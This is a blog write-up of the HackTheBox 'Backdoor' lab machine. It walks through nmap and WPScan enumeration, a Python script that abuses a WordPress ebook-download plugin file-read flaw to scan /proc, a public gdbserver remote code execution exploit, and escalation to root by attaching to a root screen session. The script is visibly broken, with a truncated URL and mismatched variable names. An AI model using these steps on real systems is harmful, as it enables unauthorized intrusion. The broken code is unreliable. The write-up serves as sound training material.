blog/content/writeup-ctf/writeup-backdoor-htb/index.md

---
title: "Writeup - Backdoor (HTB)"
date: 2022-04-19
slug: "writeup-backdoor-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Backdoor](https://app.hackthebox.com/machines/Backdoor) machine from the HackTheBox site.

# Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV 10.10.11.125
```
Three TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 8.2p1)
- 80/tcp : web server (Apache 2.4.41)
- 1337/tcp : ?????

We have a site on port 80 and port 1337 that hosts an unknown service at the moment; let's see what the site looks like.

![](img/image-2.webp)

# Exploit

After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws:

![](img/image-3.webp)

Nothing special, let's try to do an aggressive detection of the plugins. For this I use the following command:


```bash
wpscan --url http://backdoor.htb --plugin-detection aggressive
```
![](img/image-4.webp)

There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-. 

So we create a script to automate the process scan, if the page returns a message with a size greater than 82 bytes, then the process exists.


```bash
import requests

for i in range(0,1000):
    url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc>
    answer=requests.get(url)
    lg=len(answer.text)
    if(leng>82):
        if '1337' in resp.text:
            print("%d %s ",lg, answer.text)
```
After running the script, we find 2 services:

![](img/image-5.webp)

These processes are gdbserver running on our mystery port: 1337. So we can now look for exploits related to this process.

Je trouve rapidement le script suivant qui permet d'exécuter du code à distance via le service GDB :

[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539)

After generating a payload with msfvenom, I run the script :

![](img/image-6.webp)

I now have a shell on the remote machine, I can get the first flag.

![](img/image-7.webp)

# Privilege escalation

First I try to find the SUID files. For that I use the following command:


```bash
find / -perm -u=s -type f 2>/dev/null
```
![](img/image-8.webp)

There are a lot of usual commands. But among the list there is "screen".  It is a command that allows to manage several terminals at the same time. I look then if a process runs with this command:

![](img/image-9.webp)

And indeed there is a process running. But not just any process, a root shell with the options -dmS :

- -d : detache de screen when started
- -m : ignore the $STY environment variable, creation of a new session is enforced
- -S : When creating a new session, this option can be used to specify a meaningful name

So we know that a screen named root has been created with the user root. If we manage to connect to the screen, we will have access to a root shell.

To connect to the detached screen we need to use the following command:


```bash
screen -x [name]/[user]
```
But before connecting we will have to define the variable $TERM, to do this I use the following command:


```bash
export TERM=screen
```
I can now connect to the root screen with the following command:


```bash
screen -x root/root
```
I now have access to a root shell and can retrieve the last flag.

![](img/image-10.webp)

# Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Update Wordpress plugin
- Update GDB server
- Do not run screen as root with the -m variable